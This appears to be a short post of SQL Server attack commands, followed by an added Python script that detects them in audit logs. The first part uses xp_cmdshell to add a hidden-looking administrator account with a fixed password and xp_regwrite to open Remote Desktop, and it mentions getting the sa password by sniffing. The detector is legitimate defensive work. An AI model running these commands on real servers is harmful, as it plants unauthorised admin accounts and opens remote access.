Creating a user directly on Windows 2000:

-- runs "net user" through xp_cmdshell to add a local account
exec xp_cmdshell 'net user admin$ 199181 /add'
-- adds that account to the local Administrators group
exec xp_cmdshell 'net localgroup Administrators admin$ /add'
Enabling 3389 (Terminal Services) with a SQL statement:
-- writes fDenyTSConnections = 0 via xp_regwrite so the RDP listener is no longer denied
exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Control\Terminal Server', 'fDenyTSConnections', 'REG_DWORD', 0;
Disabling 3389 with a SQL statement:
-- writes fDenyTSConnections = 1 to deny Terminal Services connections again
exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Control\Terminal Server', 'fDenyTSConnections', 'REG_DWORD', 1;
That's basically it; there is nothing else.

The sa password can be obtained through sniffing or scanning.
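From the defender's side, the statements above are exactly what a SQL Server audit or Extended Events session should raise an alert on. The following added example (not part of the original post) scans captured T-SQL text for xp_cmdshell execution, xp_cmdshell being switched on via sp_configure, xp_regwrite touching the Terminal Server fDenyTSConnections value, and "net user" / "net localgroup Administrators" additions; the sample statements are constructed here, and the rule names are my own.

```python
import re

# Constructed sample of captured T-SQL statements (as a SQL Server Audit or an
# Extended Events session would record them); these are not real logs.
SAMPLE_STATEMENTS = [
    "SELECT name FROM sys.tables",
    "exec xp_cmdshell 'net user admin$ 199181 /add'",
    "exec xp_cmdshell 'net localgroup Administrators admin$ /add'",
    "exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE',"
    "'SYSTEM\\CurrentControlSet\\Control\\Terminal Server',"
    "'fDenyTSConnections','REG_DWORD',0",
    "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE",
    "UPDATE Orders SET Status = 'shipped' WHERE Id = 42",
]

# Detection rules (hypothetical names): each is (rule name, compiled regex).
RULES = [
    ("xp_cmdshell_exec",
     re.compile(r"\bexec(?:ute)?\s+(?:master\.(?:dbo)?\.)?xp_cmdshell\b", re.I)),
    ("xp_cmdshell_enable",
     re.compile(r"sp_configure\s*'xp_cmdshell'\s*,\s*1", re.I)),
    ("xp_regwrite_terminal_server",
     re.compile(r"\bxp_regwrite\b.*Terminal Server.*fDenyTSConnections", re.I | re.S)),
    ("net_user_add",
     re.compile(r"\bnet\s+user\b.*\s/add\b", re.I)),
    ("net_localgroup_admins",
     re.compile(r"\bnet\s+localgroup\s+administrators\b.*\s/add\b", re.I)),
]


def classify(statement: str) -> list[str]:
    """Return the names of every rule that matches one captured statement."""
    return [name for name, rx in RULES if rx.search(statement)]


def scan(statements) -> list[tuple[int, str, list[str]]]:
    """Return (index, statement, matched rules) for each statement that hit a rule."""
    hits = []
    for i, stmt in enumerate(statements):
        matched = classify(stmt)
        if matched:
            hits.append((i, stmt, matched))
    return hits


if __name__ == "__main__":
    for i, stmt, matched in scan(SAMPLE_STATEMENTS):
        print(f"[{i}] {', '.join(matched)}: {stmt}")
```

Feeding real audit output through scan() is the point; a hit on xp_cmdshell_enable followed by xp_cmdshell_exec from the same login is the sequence worth paging on.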